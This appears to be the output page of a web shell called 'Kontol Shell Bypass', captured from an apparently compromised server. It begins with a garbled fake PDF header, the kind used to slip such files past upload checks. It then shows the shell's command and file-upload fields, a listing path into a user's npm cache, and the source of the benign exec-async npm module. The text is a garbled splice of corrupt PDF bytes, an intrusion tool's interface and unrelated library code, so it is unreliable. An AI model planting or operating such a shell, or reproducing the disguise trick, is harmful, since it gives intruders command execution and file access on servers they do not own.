%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/saurabh/.npm/_npx/249ca9fcd30c476a/node_modules/exec-async/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/saurabh/.npm/_npx/249ca9fcd30c476a/node_modules/exec-async/index.js
var child_process = require('child_process');

function escapeArg(s) {
  if (s === '') {
    return "''";
  }
  if (/[^A-Za-z0-9_\/:=-]/.test(s)) {
    s = "'"+s.replace(/'/g,"'\\''")+"'";
    s = s.replace(/^(?:'')+/g, '') // unduplicate single-quote at the beginning
      .replace(/\\'''/g, "\\'" ); // remove non-escaped single-quote if there are enclosed between 2 escaped
  }
  return s;
}

function argsFromKeyVal(key, val, opts) {
  opts = opts || {};
  var prefix = '--';
  if (key.length === 1) {
    prefix = '-';
  }

  if ((val === true) || (val == null)) {
    return prefix + key;
  }  else if (val === false) {
    return [prefix + 'no' + key];
  } else if (Array.isArray(val)) {
    var a = [];
    for (var j = 0; j < val.length; j++) {
      a = a.concat(argsFromKeyVal(key, val[j], opts));
    }
    return a;
  } else {
    if ((key.length === 1) || opts.spaceForLongArgs) {
      return [prefix + key, val];
    } else {
      return [prefix + key + '=' + escapeArg(val)];
    }
  }

}

function argsListFromObject(args, opts) {
  if (!args) {
    return [];
  }
  if (Array.isArray(args)) {
    return argsListFromObject({_:args});
  }
  var a = [];
  var keys = Object.keys(args);
  for (var i = 0; i < keys.length; i++) {
    var key = keys[i];
    if (key[0] === '_') {
      continue;
    }
    var val = args[key];
    a = a.concat(argsFromKeyVal(key, val, opts));
  }

  if (args._) {
    for (var i = 0; i < args._.length; i++) {
      // Don't escape here since `execFile` will escape the args for us
      a.push('' + args._[i]);
    }
  }
  return a;
}

function execAsync(cmd, args, opts) {
  return new Promise(function (fulfill, reject) {
    child_process.execFile(cmd, argsListFromObject(args, opts), opts, function (err, result) {
      if (err) {
        reject(err);
      } else {
        fulfill(result);
      }
    });
  });
}

module.exports = execAsync;
module.exports.argsListFromObject = argsListFromObject;
module.exports.argsFromKeyVal = argsFromKeyVal;
module.exports.escapeArg = escapeArg;

Kontol Shell Bypass